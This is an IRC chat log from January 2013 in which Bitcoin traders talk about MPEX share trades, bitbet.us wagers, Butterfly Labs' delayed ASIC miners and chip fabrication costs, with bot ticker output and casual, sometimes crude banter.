Be diligent. Jan 13 23:56:13 ^^^ the exchange mr. EskimoBob trusts so much Jan 13 23:56:40 lol which one is that? Jan 13 23:57:07 >In Debian project parlance, the term stable means that the software is no longer under active development or widespread use and that the authors are long dead Jan 13 23:57:17 lol Jan 13 23:57:20 kakobrekla: yes. Jan 13 23:59:34 kakobrekla: ltc-global Jan 14 00:05:40 [MPEX] [S.DICE] 617 @ 0.00469701 = 2.8981 BTC [-] Jan 14 00:06:22 kakobreakla I posted a varient NFL bet with shallow decay, I think it will perform better than the existing one. Please approve. Big funding already sent Jan 14 00:14:35 yay I made new enemy Jan 14 00:14:39 may da war begin! Jan 14 00:14:47 enemty territory Jan 14 00:14:49 good game Jan 14 00:14:54 i played it a week ago Jan 14 00:15:06 enemy* Jan 14 00:15:27 10yrs old or so Jan 14 00:15:37 i was only a baby then Jan 14 00:18:05 EskimoBob: I challenge you to a duel! Jan 14 00:23:54 What kind of codex you're going to duel by? Jan 14 00:24:20 http://www.youtube.com/watch?v=5MtAMc4i8OA Jan 14 00:25:04 [HAVELOCK] [KCIM] 1 @ 0.9 BTC [-] Jan 14 00:25:14 I thought something more classic, like Busson or Bolgar Jan 14 00:25:22 what Jan 14 00:25:25 this is a classic. Jan 14 00:26:09 http://www.imdb.com/title/tt0067023/ Jan 14 00:26:16 a spielbergs thing. Jan 14 00:26:41 I mean 19th century german honor code. Jan 14 00:27:27 a looky look, full movie http://www.youtube.com/watch?v=pnHjfGaN3kw Jan 14 00:29:23 i love this channel haha Jan 14 00:36:36 Well, he wanted to duel so why not do it semi-properly, at least Jan 14 00:38:34 Dammit now i gotta watch it till the end again. Jan 14 00:39:07 Kakobrekla, ever seen The Student from Prague or Der Untertan? Jan 14 00:39:19 They're pretty old tho Jan 14 00:39:53 ill check it out if you think its worthy Jan 14 00:41:12 If you find an english translation for them, they're pretty good Jan 14 00:42:33 https://www.youtube.com/watch?v=sSyEwZ7Zg5c - Did a terrible job at portraying the real thing tho Jan 14 00:43:10 from the 'overheard in goldman sachs elevator' twitter feed - The most and least successful people all share the same trait: thinking they.re never wrong. Jan 14 00:43:49 EskimoBob: where do you fall? Jan 14 00:44:15 heh Jan 14 00:44:18 #1: A chick I banged once and haven't seen since just added me on LinkedIn. #2: She wants you to give her 'the business' again. Jan 14 00:45:36 Most successful people wouldn't be successful if they didn't *accurately* gauge their abbilities Jan 14 00:46:08 let's see. buffett was pretty successful. Jan 14 00:46:16 he doesn't seem to think he's never wrong. Jan 14 00:46:32 maybe someone farted in that elevator ? Jan 14 00:49:51 HEH http://gselevator.wordpress.com/2013/01/11/the-gym/ Jan 14 00:52:20 I’m 19th century sexy – pale skin and a fat ass, and fortunately, a fatter wallet. Jan 14 00:52:29 [MPEX] [S.DICE] 40 @ 0.00457135 = 0.1829 BTC [-] Jan 14 00:52:31 [MPEX] [S.DICE] 1185 @ 0.00454328 = 5.3838 BTC [-] Jan 14 00:52:32 lol. perfect for a two weeks rope&whips vacation. Jan 14 01:19:44 ;;later tell bugpowder pm. Jan 14 01:19:45 The operation succeeded. Jan 14 01:28:31 [BTCTC] [BASIC-MINING] 10 @ 0.325 = 3.25 BTC [+] Jan 14 01:31:15 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Jan 14 01:31:21 306:255 by now Jan 14 01:31:26 im curious if it breaks the 1000 Jan 14 01:32:03 ;;calc 26136992 / 21291345.0 Jan 14 01:32:04 1.22758764183 Jan 14 01:33:28 Well, considering the large amount of preorders and that they pulled off making an FPGA... I know making an ASIC is incredibly harder and expensive. Jan 14 01:33:51 But if one is to deliver ASICs, that would be BFL. Jan 14 01:33:52 It's like a futures on their delivery date... Jan 14 01:34:00 Although I seriously doubt their specs Jan 14 01:34:19 But they had enough funds to get an ASIC developed. Jan 14 01:34:50 i know for 2 more people that have enough funds, without taking preorders in the public Jan 14 01:35:03 one sent me a core pic yesterday :> Jan 14 01:40:42 Namworld i don't think a couple million is enough funds Jan 14 01:40:49 by about a degree of magnitude at the least. Jan 14 01:41:16 >>the difference is pretty high and so risks of failure - 150nm - $80k, 130nm - $200k, 90nm - $400k, 65nm - $800k - to get sample round. but with 90nm - it is 120 TH/s just in single engineering shot. Jan 14 01:41:46 >>physical verification (i.e. I give to physical verification engineer design + test vectors) - is about $30k and 1 month delay - but that dramatically reduces failure chances. Jan 14 01:42:00 bfl failed once so far. Jan 14 01:43:19 kakobrekla what are those numbers ? Jan 14 01:43:31 to get a run done Jan 14 01:43:31 per wafer costs of printing only ? Jan 14 01:43:40 to print ze chips Jan 14 01:43:52 yes. here's the thing : i was for a time working with a printing business. Jan 14 01:44:04 they ran smallish (10-100k) sort of runs. Jan 14 01:44:11 every given book cost between 10 and 20 dollars. Jan 14 01:44:31 every given run cost between 20k and i think at most i ever signed off on a 95k typo bill. Jan 14 01:44:46 but usually the printing cost was <10% of the book. Jan 14 01:44:51 mircea_popescu: how much was the printing firms start up costs, and how long have they been in operation? Jan 14 01:45:04 and the great advantage of the printing business is that you don't need to pay the author at all. Jan 14 01:45:14 he's happy with 50 cents per copy and his name on the cover. Jan 14 01:45:37 thestringpuller it was small, i wasn't there when it started up and it meanwhile folded Jan 14 01:45:50 final installation w power w cooling w/o case is extra 2$ per W Jan 14 01:45:53 everything that has a beginning has an end Jan 14 01:46:19 so now here's the thing : your 500-1mn per wafer run costs are correct, Jan 14 01:46:31 but they're also 10 to 1% of the actual cost of delivering a finished product. Jan 14 01:46:47 not with the hot glue used. Jan 14 01:46:49 r u crazy. Jan 14 01:47:09 lol ? Jan 14 01:47:44 leme find it for ya Jan 14 01:47:54 hot glued USB Jan 14 01:48:03 for superior thermal profile Jan 14 01:48:13 and fans Jan 14 01:48:14 http://shrani.si/f/1M/wG/1HqaXu01/yv4e6.jpg Jan 14 01:48:36 or is it how you attach your clock registers Jan 14 01:48:42 clock buffers. Jan 14 01:48:47 oh sorry Jan 14 01:48:51 kakobrekla what about that ?! Jan 14 01:48:55 registers will be added in the next fail Jan 14 01:48:58 lmao Jan 14 01:49:10 mircea_popescu note the hot glue errywhere Jan 14 01:49:22 I actually dont have a problem with that Jan 14 01:49:22 omg wtf is that Jan 14 01:49:23 and also that thing Jan 14 01:49:24 caulk ?! Jan 14 01:49:33 please tell me thats not plumbing material ? Jan 14 01:49:34 that sticks the usbs to the side Jan 14 01:49:35 those fuckers would have wiggled free eventually Jan 14 01:49:38 dunno how you call it Jan 14 01:49:46 mircea_popescu HOT GLUE Jan 14 01:49:59 duide that's caulk Jan 14 01:50:00 look at it Jan 14 01:50:02 for ikebanas Jan 14 01:50:15 http://www.steinel.de/out/pictures/master/product/1/stw_106319104.png Jan 14 01:50:19 http://www.lowes.com/images/LCI/Planning/BuyingGuides/bg_CaulkBG_specialty_caulk.jpg Jan 14 01:50:31 perhaps Jan 14 01:50:34 whatever it is Jan 14 01:50:40 kakobrekla: you in the chip building business? Jan 14 01:50:59 well, not really. Jan 14 01:51:31 jurov more EMT/MMT stuff eh ? Jan 14 01:53:23 lol Jan 14 01:53:24 or a reason to get a cat Jan 14 01:53:48 we could have got a rabbit to pick glbse stocks for a fund and see if it did better than usagi Jan 14 01:54:07 thestringpuller, i was helping fizzisist at the start with fpga, then i was workin with bitfury for a while to get his last batch out and now im also working for ET/TML in a way Jan 14 01:54:09 rather a hamster, less space/upkeep Jan 14 01:54:15 of course we'd run out fo LSD Jan 14 01:55:50 dub lol Jan 14 01:56:12 https://bitcointalk.org/index.php?topic=112876.msg1221157#msg1221157 Jan 14 01:56:20 i was reading this otherwise very impressive thing Jan 14 01:56:41 then i got to the table. deprived's fund made 20% in an interval ltc/btc went in his favour 50% Jan 14 01:56:55 i take it glbse really fucked things up for people. Jan 14 01:57:38 yea, brace ur. exactly this thing is going to invest into mpex and operate a pt ;) Jan 14 01:57:55 the guy seems pretty on the ball tbh. Jan 14 01:58:02 from what i've seen at least. Jan 14 02:02:03 wat Jan 14 02:03:26 http://bitbet.us/bet/119/the-spot-gold-price-will-trade-above-2000-oz/ Jan 14 02:03:27 heh. Jan 14 02:03:30 bitcoiners are goldbugs huh Jan 14 02:04:54 hard to take srsly, all this detailed info and analysis about enough money to buy mcdonalds Jan 14 02:06:31 fear not, he has withdrawn half the balance from such and such exchange to secure a badly cooked steak against further loss Jan 14 02:08:23 i made enough money to buy mcdonalds but i pissed it away so fast Jan 14 02:09:29 [MPEX] [S.DICE] 1000 @ 0.00454329 = 4.5433 BTC [+] Jan 14 02:09:30 [MPEX] [S.DICE] 115 @ 0.00454328 = 0.5225 BTC [-] Jan 14 02:09:31 [MPEX] [S.DICE] 985 @ 0.00453792 = 4.4699 BTC [-] Jan 14 02:10:15 dub i agree the entire volume is tiny Jan 14 02:10:22 remember kids, "if you don't believe in BFL, then you don't believe in bitcoin." Jan 14 02:10:28 but why is that a bad thing ? Jan 14 02:10:44 if the troop of "financiers" acting up on glbse had followed the same route Jan 14 02:10:53 we'd be looking at a few btc total losses today. Jan 14 02:11:00 it seems like masturbation more than anything Jan 14 02:11:05 ist is Jan 14 02:11:10 he could make more money WORKING at mcdonalds Jan 14 02:11:11 education is masturbation. Jan 14 02:11:21 he could make more _money_ Jan 14 02:11:25 money isn't everything. Jan 14 02:11:31 than writing all this forum fluff Jan 14 02:11:39 oh he actually announced the passthrough below the last results Jan 14 02:12:14 specifically states he needs to "cover 0.09 BTC/month brokerage fee" Jan 14 02:12:19 yea that will be tough Jan 14 02:12:31 well his total NW is what, 50 btc or so ? Jan 14 02:12:38 might need to go to the tooth fairy for a loan Jan 14 02:12:48 lol you two meanines Jan 14 02:13:02 or fairy godmother bernanke Jan 14 02:13:05 linkie Jan 14 02:13:26 https://bitcointalk.org/index.php?topic=112876.msg1450475#msg1450475 Jan 14 02:15:09 i remember when i found out my parents are the tooth fairy. i still don't know how they afford to buy every kid's teeth and how they sneak into the bedrooms and get back Jan 14 02:15:43 instantrimshot.com Jan 14 02:16:09 mohairsluts.com Jan 14 02:16:13 [BTCTC] [BTC-BOND] 4 @ 0.011 = 0.044 BTC [+] Jan 14 02:16:31 o no way Jan 14 02:16:47 ffs. Jan 14 02:16:52 im getting hohairsluts.com Jan 14 02:17:04 [MPEX] [S.DICE] 650 @ 0.00453792 = 2.9496 BTC [-] Jan 14 02:17:48 http://www.mohairsluts.com/Thumbnail_foto_bestanden/nathalie/tn_mohairsluts006.jpg Jan 14 02:17:51 wtf i don't even Jan 14 02:17:52 "I believe so much in bitcoin that I wear this fucking button each day" --micon Jan 14 02:21:45 http://tinysong.com/qVud Jan 14 02:23:50 wat Jan 14 02:33:05 [MPEX] [S.DICE] 1300 @ 0.00457753 = 5.9508 BTC [+] Jan 14 02:33:07 [MPEX] [S.DICE] 254 @ 0.00459432 = 1.167 BTC [+] Jan 14 02:39:36 [MPEX] [S.DICE] 165 @ 0.00453792 = 0.7488 BTC [-] Jan 14 02:39:38 [MPEX] [S.DICE] 384 @ 0.00452778 = 1.7387 BTC [-] Jan 14 02:41:52 [MPEX] [S.DICE] 1763 @ 0.00452146 = 7.9713 BTC [-] Jan 14 02:42:49 [MPEX] [O.BTCUSD.C120T] 800 @ 0.15603262 = 124.8261 BTC [-] Jan 14 02:42:56 [MPEX] [O.BTCUSD.C120T] 200 @ 0.15603262 = 31.2065 BTC [-] Jan 14 02:43:05 [MPEX] [O.BTCUSD.C110T] 720 @ 0.21996239 = 158.3729 BTC [-] Jan 14 02:44:50 >>Inaba, According to a couple of your posts in the BFL forums, there was going to be some kind of announcement from BFL, either today or tomorrow which should add some clarity to the current situation. Is this still true? Jan 14 02:44:55 >Yep, I've been working on it this afternoon. It's almost done and will be posted soon. I've tried to answer all the questions that have been asked so far and I don't think I've missed anything. Jan 14 02:45:02 ooo. Jan 14 02:45:05 hmmm Jan 14 02:45:14 "we failed again" Jan 14 02:45:21 lets make a bet? Jan 14 02:45:31 a quicky. Jan 14 02:47:13 [MPEX] [S.DICE] 1432 @ 0.00452471 = 6.4794 BTC [+] Jan 14 02:49:35 lol Jan 14 02:50:56 If you want to get the returns of MPOE bonds without actually buying them, PM me Jan 14 02:51:13 :O Jan 14 02:51:41 "Update should be within the hour. Tomorrow some packaged chips should be shipping back to assembly to test some rigs is my bet." Jan 14 02:52:08 eh? Jan 14 02:52:13 you srslty betting on that ? Jan 14 02:52:18 nope Jan 14 02:52:22 lol k Jan 14 02:52:27 just pasting what I saw in their forums Jan 14 02:52:32 I don't bet Jan 14 02:52:34 ;) Jan 14 02:52:38 except for sd Jan 14 02:52:42 oh yeah Jan 14 02:52:42 ... Jan 14 02:52:43 that Jan 14 02:52:46 ;) Jan 14 02:52:48 i do believe in fairies Jan 14 02:54:21 [MPEX] [S.DICE] 429 @ 0.00459432 = 1.971 BTC [+] Jan 14 02:54:23 [MPEX] [S.DICE] 1721 @ 0.0046512 = 8.0047 BTC [+] Jan 14 02:57:15 TradeFortress,gonna buy MPBPT ? :D Jan 14 02:59:40 Confirmed total: 943 BTC Jan 14 02:59:45 o ya 1k is going away. Jan 14 03:00:06 remarkably tho : average bet is like 2 btc! Jan 14 03:01:11 100b incoming Jan 14 03:01:17 w next block Jan 14 03:01:23 ;) Jan 14 03:02:18 lol that lasted long Jan 14 03:02:39 im curious which will be the first 1mn month. Jan 14 03:16:29 [MPEX] [S.DICE] 400 @ 0.0046512 = 1.8605 BTC [+] Jan 14 03:22:17 mircea_popescu: is that a more recent picture of you Jan 14 03:22:23 reading the newspaper Jan 14 03:28:26 mircea, you put another 325 down on the BFL shipping? Jan 14 03:28:52 err NOT shipping Jan 14 03:29:39 thats not his addy Jan 14 03:34:30 [MPEX] [S.DICE] 1268 @ 0.00453512 = 5.7505 BTC [-] Jan 14 03:34:32 [MPEX] [S.DICE] 1032 @ 0.00452146 = 4.6661 BTC [-] Jan 14 03:46:51 [MPEX] [S.DICE] 2000 @ 0.00453244 = 9.0649 BTC [+] Jan 14 03:46:53 [MPEX] [S.DICE] 605 @ 0.00452146 = 2.7355 BTC [-] Jan 14 03:46:54 [MPEX] [S.DICE] 2 @ 0.00451817 = 0.009 BTC [-] Jan 14 03:46:56 [MPEX] [S.DICE] 2856 @ 0.00451808 = 12.9036 BTC [-] Jan 14 03:53:57 oh, is that people sending in bets directly from the MPEX account? Jan 14 03:54:28 hmm? Jan 14 03:54:56 How does that work. 1Fx3N is the MPEX deposit address Jan 14 03:55:37 a Jan 14 03:55:39 didnt notice Jan 14 03:55:48 it was in the outputs Jan 14 03:55:58 of the incoming Jan 14 03:56:02 just check the outgoing Jan 14 03:56:06 checked Jan 14 03:56:14 i dunno then Jan 14 04:04:05 [HAVELOCK] [SDICE] 1 @ 0.475 BTC [-] Jan 14 04:06:51 kakobrekla: the bot isn't working Jan 14 04:07:04 hm? Jan 14 04:07:34 i'm just trolling Jan 14 04:07:36 I'm bad at tit Jan 14 04:07:37 it* Jan 14 04:07:59 !ticker wtf thestringpuller Jan 14 04:07:59 I cooked, I cleaned, and I sewed, and I have a right to get-- Jan 14 04:09:39 good at it Jan 14 04:10:27 [MPEX] [S.DICE] 844 @ 0.00451808 = 3.8133 BTC [-] Jan 14 04:10:29 [MPEX] [S.DICE] 806 @ 0.00451757 = 3.6412 BTC [-] Jan 14 04:10:45 !ticker s.dice Jan 14 04:10:46 Provide exchange and ticker. Jan 14 04:10:51 !ticker m s.dice Jan 14 04:10:53 [MPEX:S.DICE] 1D: 0.00451757 / 0.00463652 / 0.00475127 (129250 shares, 599.27 BTC), 7D: 0.004312 / 0.00467992 / 0.0048 (1917772 shares, 8,975.02 BTC), 30D: 0.0014 / 0.00353248 / 0.0048 (11823034 shares, 41,764.64 BTC) Jan 14 04:12:25 ;;ticker Jan 14 04:12:26 BTCUSD ticker | Best bid: 14.15001, Best ask: 14.23299, Bid-ask spread: 0.08298, Last trade: 14.15001, 24 hour volume: 38939.12902034, 24 hour low: 13.94896, 24 hour high: 14.31480, 24 hour vwap: 14.10660 Jan 14 04:26:12 ;;ticker Jan 14 04:26:13 BTCUSD ticker | Best bid: 14.27000, Best ask: 14.27018, Bid-ask spread: 0.00018, Last trade: 14.27000, 24 hour volume: 40264.04375136, 24 hour low: 13.94896, 24 hour high: 14.31480, 24 hour vwap: 14.11130 Jan 14 04:26:18 [MPEX] [S.DICE] 650 @ 0.00456584 = 2.9678 BTC [+] Jan 14 04:30:16 [MPEX] [S.DICE] 94 @ 0.00451757 = 0.4247 BTC [-] Jan 14 04:30:18 [MPEX] [S.DICE] 1117 @ 0.00451713 = 5.0456 BTC [-] Jan 14 04:30:19 [MPEX] [S.DICE] 1035 @ 0.00451663 = 4.6747 BTC [-] Jan 14 04:30:21 [MPEX] [S.DICE] 286 @ 0.00451516 = 1.2913 BTC [-] Jan 14 04:30:22 [MPEX] [S.DICE] 68 @ 0.00451039 = 0.3067 BTC [-] Jan 14 04:30:35 oops Jan 14 04:30:37 [MPEX] [S.DICE] 1282 @ 0.00451039 = 5.7823 BTC [-] Jan 14 04:30:37 fat finger Jan 14 04:30:38 [MPEX] [S.DICE] 1665 @ 0.00450947 = 7.5083 BTC [-] Jan 14 04:30:40 [MPEX] [S.DICE] 53 @ 0.00450832 = 0.2389 BTC [-] Jan 14 04:32:33 your a fat finger Jan 14 04:32:41 you're* Jan 14 04:33:35 If you hold YABMC shares, please cast your vote on it's future on the forums. - https://bitcointalk.org/index.php?topic=75867.380 Jan 14 04:34:09 kakobrekla, the closing times for the bets I posted are off. Closing happens at the start of the day not the end of the day, so now all my bets are closing Friday night instead of Sat. Jan 14 04:34:26 despite my setting of the closing day to 12-20 Jan 14 04:34:29 err Jan 14 04:34:32 1-20-2013 Jan 14 04:35:40 i halted bb daemon for a sec now Jan 14 04:35:56 i can change that if it needs to be, no bets yet confirmed on em Jan 14 04:36:26 hm Jan 14 04:37:52 ok... Yeah, originally you said it was end of day, but when I set it up last week, I saw it was start of day. Thats why I shifted the resolution time to the 22nd, to try to catch it at 24:00 of the 19th / 0:00 of the 20th Jan 14 04:38:07 yes that was my mistake Jan 14 04:38:25 as soon as gmt time >= date Jan 14 04:38:27 its closed Jan 14 04:38:36 yup Jan 14 04:39:00 hm Jan 14 04:39:04 your proposed date was 1358812800 Jan 14 04:39:11 uhh Jan 14 04:39:12 which IS the reosolution timestamp Jan 14 04:39:21 in curious now Jan 14 04:39:23 hmmm Jan 14 04:39:28 did i f up? Jan 14 04:39:38 i thought I did 2 days before 22nd Jan 14 04:39:43 [MPEX] [S.DICE] 1347 @ 0.00450832 = 6.0727 BTC [-] Jan 14 04:39:45 [MPEX] [S.DICE] 953 @ 0.00450698 = 4.2952 BTC [-] Jan 14 04:39:54 the unix time stamp is the same on proposal than on bet in the db Jan 14 04:40:02 now its possibly something else is wrong Jan 14 04:40:06 possible Jan 14 04:40:29 ill do a quick test Jan 14 04:40:50 also my txn's confirmed with the last block Jan 14 04:40:59 21 min ago Jan 14 04:41:06 one sec we will get to that Jan 14 04:41:10 yup Jan 14 04:42:03 HUGE BFL ANNOUNCEMENT Jan 14 04:42:04 https://forums.butterflylabs.com/announcements/692-bfl-asic-status.html#post10249 Jan 14 04:42:40 http://bitbet.us/bet/128/test/ Jan 14 04:42:45 i pasted 1.2 in the form Jan 14 04:42:46 and its 1.2 Jan 14 04:42:53 no problem as far as i can see Jan 14 04:43:00 possibly the bet approve team changed the date Jan 14 04:43:34 deleted now Jan 14 04:43:42 (the test) Jan 14 04:44:29 " When we announced the delay last month, we decided to go back and switch from our QFN package to a flip chip BGA (FCBGA) package. " I knew the chip bonding was going to be a problem. looks like it is Jan 14 04:45:21 anyway Jan 14 04:45:27 everything checks out here Bugpowder Jan 14 04:45:30 "Originally, we were at about .8w per GH (Yes, we built 20% into our announcements) and we are estimating that it's possible that a worst case scenario would lead to a bit under 1.2w per GH. " Jan 14 04:45:34 tell me now if you want me to do +1 day Jan 14 04:45:38 you have 30sec Jan 14 04:45:40 yes Jan 14 04:45:43 ok Jan 14 04:45:51 I want it to end on the morning of the game Jan 14 04:46:00 00:00 Jan 14 04:46:29 1358899200 ? Jan 14 04:46:51 no Jan 14 04:46:55 thats weds Jan 14 04:47:12 thats 24hrs more than current Jan 14 04:47:16 1358812800+(60*60*24) Jan 14 04:47:18 1358640000 Jan 14 04:47:23 oh Jan 14 04:47:26 you mean resolve? Jan 14 04:47:29 yes Jan 14 04:47:30 I just want betting to end Jan 14 04:47:33 at 1358640000 Jan 14 04:47:34 what did you mean? Jan 14 04:47:36 aaa Jan 14 04:47:37 however it takes Jan 14 04:47:41 what is the picture of in that post? Jan 14 04:47:48 needs login to enlarge Jan 14 04:47:55 end vote is 1358553600 Jan 14 04:48:03 so you get 1358640000 Jan 14 04:48:07 +24h Jan 14 04:48:08 ok? Jan 14 04:48:13 ya Jan 14 04:48:14 ok Jan 14 04:48:17 ok Jan 14 04:48:19 [MPEX] [S.DICE] 1100 @ 0.00456584 = 5.0224 BTC [+] Jan 14 04:48:21 [MPEX] [S.DICE] 400 @ 0.00464467 = 1.8579 BTC [+] Jan 14 04:48:22 [MPEX] [S.DICE] 240 @ 0.0046512 = 1.1163 BTC [+] Jan 14 04:49:01 Bugpowder http://bitbet.us/bet/127/nfl-playoffs-new-england-patriots-8-5-over/ Jan 14 04:49:05 all good? Jan 14 04:49:06 [MPEX] [S.DICE] 1350 @ 0.0046593 = 6.2901 BTC [+] Jan 14 04:49:23 imma gonna fire up ze daemon Jan 14 04:49:28 dates look good Jan 14 04:49:40 now we jusss need some coin down on that shizz Jan 14 04:49:44 and the bet are in Jan 14 04:49:46 f5 Jan 14 04:50:08 about why its not instantly confirmed Jan 14 04:50:19 curretly i check at a new block Jan 14 04:50:30 its a bit suboptimal Jan 14 04:50:34 and will fix that soonish Jan 14 04:50:44 so this will be all faster Jan 14 04:50:46 no worries Jan 14 04:50:53 "Week of February 10th We implement the 1/3 shipping plan en mass 1/3 of our assembled units will go to new orders in FIFO 1/3 of our assembled units will go to upgrade orders 1/3 will be randomly selected from both groups" Jan 14 04:51:15 Please let this drive more betting on the YES side Jan 14 04:53:36 [MPEX] [S.DICE] 700 @ 0.00468357 = 3.2785 BTC [+] Jan 14 04:53:38 [MPEX] [S.DICE] 1371 @ 0.0046876 = 6.4267 BTC [+] Jan 14 04:54:22 oh sorry, none of you were in any of those thirds Jan 14 04:55:05 [MPEX] [S.DICE] 838 @ 0.0046876 = 3.9282 BTC [+] Jan 14 04:55:18 I think bitbet now officially has more bTC outstanding than betsofbitcoin Jan 14 04:55:49 ponzi Jan 14 04:57:18 Anyone in here can loan about 100 BTC through BTC-BOND? Jan 14 05:02:00 [MPEX] [S.DICE] 200 @ 0.00469855 = 0.9397 BTC [+] Jan 14 05:10:40 [MPEX] [S.MPOE] 13105 @ 0.00063268 = 8.2913 BTC [+] Jan 14 05:10:41 [MPEX] [S.MPOE] 3000 @ 0.00064579 = 1.9374 BTC [+] Jan 14 05:10:43 [MPEX] [S.MPOE] 16495 @ 0.0006458 = 10.6525 BTC [+] Jan 14 05:12:24 [MPEX] [S.DICE] 1487 @ 0.00469837 = 6.9865 BTC [-] Jan 14 05:12:26 [MPEX] [S.DICE] 62 @ 0.00469621 = 0.2912 BTC [-] Jan 14 05:12:27 [MPEX] [S.DICE] 392 @ 0.0046593 = 1.8264 BTC [-] Jan 14 05:13:41 I just realised assbot stands for assetbot :s Jan 14 05:14:26 thats a false presumption Jan 14 05:23:19 kakobrekla cant get none unless you got buns hun Jan 14 05:24:58 >>>1/3 of our assembled units will go to new orders in FIFO 1/3 of our assembled units will go to upgrade orders 1/3 will be randomly selected from both groups" Jan 14 05:25:00 wait Jan 14 05:25:08 isnt that then the 1/2 plan Jan 14 05:25:31 how is randomly selecting between 2 1/3 any other than 2x 1/2 Jan 14 05:26:00 [MPEX] [S.DICE] 1000 @ 0.00452109 = 4.5211 BTC [-] Jan 14 05:29:06 [MPEX] [S.DICE] 507 @ 0.00450698 = 2.285 BTC [-] Jan 14 05:33:04 [MPEX] [S.DICE] 406 @ 0.00450698 = 1.8298 BTC [-] Jan 14 05:33:06 [MPEX] [S.DICE] 1294 @ 0.00450501 = 5.8295 BTC [-] Jan 14 05:33:20 kakobrekla: maff Jan 14 05:33:35 and fings Jan 14 05:33:44 oh yeah Jan 14 05:36:23 no its different Jan 14 05:36:31 the random is non fifo Jan 14 05:39:05 http://www.businessinsider.com/imf-admitted-their-economists-were-wrong-2013-1 Jan 14 05:46:55 [MPEX] [S.DICE] 606 @ 0.00450501 = 2.73 BTC [-] Jan 14 05:46:57 [MPEX] [S.DICE] 110 @ 0.00450374 = 0.4954 BTC [-] Jan 14 05:54:18 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] Jan 14 05:56:54 finest choice you could make Jan 14 06:02:20 [MPEX] [S.DICE] 859 @ 0.00450374 = 3.8687 BTC [-] Jan 14 06:02:22 [MPEX] [S.DICE] 800 @ 0.00450356 = 3.6028 BTC [-] Jan 14 06:02:23 [MPEX] [S.DICE] 500 @ 0.004502 = 2.251 BTC [-] Jan 14 06:02:23 [MPEX] [S.DICE] 975 @ 0.00450129 = 4.3888 BTC [-] Jan 14 06:05:51 Well... outside MPEx that is. Jan 14 06:05:56 S.DICE is nice too Jan 14 06:11:58 [MPEX] [S.DICE] 295 @ 0.00452109 = 1.3337 BTC [+] Jan 14 06:11:59 [MPEX] [S.DICE] 816 @ 0.00456769 = 3.7272 BTC [+] Jan 14 06:12:48 ;;ticker Jan 14 06:12:49 BTCUSD ticker | Best bid: 14.23001, Best ask: 14.29099, Bid-ask spread: 0.06098, Last trade: 14.28998, 24 hour volume: 40998.52702455, 24 hour low: 13.94896, 24 hour high: 14.31480, 24 hour vwap: 14.11527 Jan 14 06:17:34 ;;bc,stats Jan 14 06:17:36 Current Blocks: 216450 | Current Difficulty: 3249549.5844872 | Next Difficulty At Block: 217727 | Next Difficulty In: 1277 blocks | Next Difficulty In About: 1 week, 2 days, 22 hours, 1 minute, and 7 seconds | Next Difficulty Estimate: 2910803.38168369 | Estimated Percent Change: -10.4244047981 Jan 14 06:21:34 [MPEX] [S.DICE] 1982 @ 0.00456769 = 9.0532 BTC [+] Jan 14 06:25:12 [MPEX] [S.DICE] 1900 @ 0.00468288 = 8.8975 BTC [+] Jan 14 06:25:14 [MPEX] [S.DICE] 900 @ 0.00469855 = 4.2287 BTC [+] Jan 14 06:25:15 [MPEX] [S.DICE] 1150 @ 0.00470673 = 5.4127 BTC [+] Jan 14 06:25:15 [MPEX] [S.DICE] 1200 @ 0.00470687 = 5.6482 BTC [+] Jan 14 06:25:17 [MPEX] [S.DICE] 550 @ 0.00472364 = 2.598 BTC [+] Jan 14 06:25:18 [MPEX] [S.DICE] 1900 @ 0.00472602 = 8.9794 BTC [+] Jan 14 06:31:10 http://tinysong.com/a0JV Jan 14 06:33:21 so that's why blocks are taking this long Jan 14 06:40:07 [MPEX] [S.DICE] 916 @ 0.0046023 = 4.2157 BTC [-] Jan 14 06:40:31 why? Jan 14 06:54:54 [MPEX] [S.MPOE] 1000 @ 0.00062773 = 0.6277 BTC [-] Jan 14 06:54:56 [MPEX] [S.MPOE] 13300 @ 0.00062772 = 8.3487 BTC [-] Jan 14 06:58:28 [MPEX] [S.DICE] 2000 @ 0.00471295 = 9.4259 BTC [+] Jan 14 06:58:30 [MPEX] [S.DICE] 1100 @ 0.00471127 = 5.1824 BTC [-] Jan 14 07:00:56 [MPEX] [O.BTCUSD.P130T] 10 @ 0.08799123 = 0.8799 BTC [+] Jan 14 07:01:34 [MPEX] [S.DICE] 2000 @ 0.00472601 = 9.452 BTC [+] Jan 14 07:01:35 [MPEX] [S.DICE] 5000 @ 0.00472602 = 23.6301 BTC [+] Jan 14 07:07:47 [MPEX] [S.DICE] 1750 @ 0.00471127 = 8.2447 BTC [-] Jan 14 07:12:09 dub: network hash rate down Jan 14 07:12:24 difficulty is set to retarget still in a while, so the diffficulty is higher than it should be Jan 14 07:12:29 -> blocks on average takes longer Jan 14 07:14:43 btw, if you're interested in insuring MPOE bonds and get some nice profit, let me know Jan 14 07:15:16 ;;bc,difchange Jan 14 07:15:17 Error: "bc,difchange" is not a valid command. Jan 14 07:15:21 ;;bc,diffchange Jan 14 07:15:30 Estimated percent change in difficulty this period | -10.7363427947 % based on data since last change | -13.141668681 % based on data for last three days Jan 14 07:16:35 what does "insuring MPOE bonds" mean TradeFortress ? Jan 14 07:17:12 pigeons: it means that you cover MPOE losses if that happens, in exchange for taking a large cut of the returns Jan 14 07:17:41 of you want someone to go in with you on that, ok Jan 14 07:18:11 I'm doing the CoinBr.MBPT thing Jan 14 07:25:58 Anyone got BTCT.co/Bitfunder/Cryptostock things? I feel like shorting stuff. Jan 14 07:34:56 [MPEX] [S.DICE] 300 @ 0.00471127 = 1.4134 BTC [-] Jan 14 07:34:58 [MPEX] [S.DICE] 1168 @ 0.00468137 = 5.4678 BTC [-] Jan 14 07:41:03 [BTCTC] [BASIC-MINING] 1 @ 0.33 BTC [+] Jan 14 07:48:44 [MPEX] [S.DICE] 2465 @ 0.00470045 = 11.5866 BTC [+] Jan 14 07:48:46 [MPEX] [S.DICE] 1103 @ 0.00472602 = 5.2128 BTC [+] Jan 14 07:48:47 [MPEX] [S.DICE] 1182 @ 0.00475 = 5.6145 BTC [+] Jan 14 07:53:50 I guess not Jan 14 08:09:06 [MPEX] [S.DICE] 1450 @ 0.0047146 = 6.8362 BTC [-] Jan 14 08:12:33 TradeFortress is a spy! Jan 14 08:12:57 spy sappin' my sentry! Jan 14 08:18:07 thestringpuller not really, that's from like luxor cca 2004 Jan 14 08:18:29 How does that work. 1Fx3N is the MPEX deposit address << what's the problem ? you can put any addy you want in ther withdraw field Jan 14 08:19:53 "Originally, we were at about .8w per GH (Yes, we built 20% into our announcements << that'd be 25% neh ? 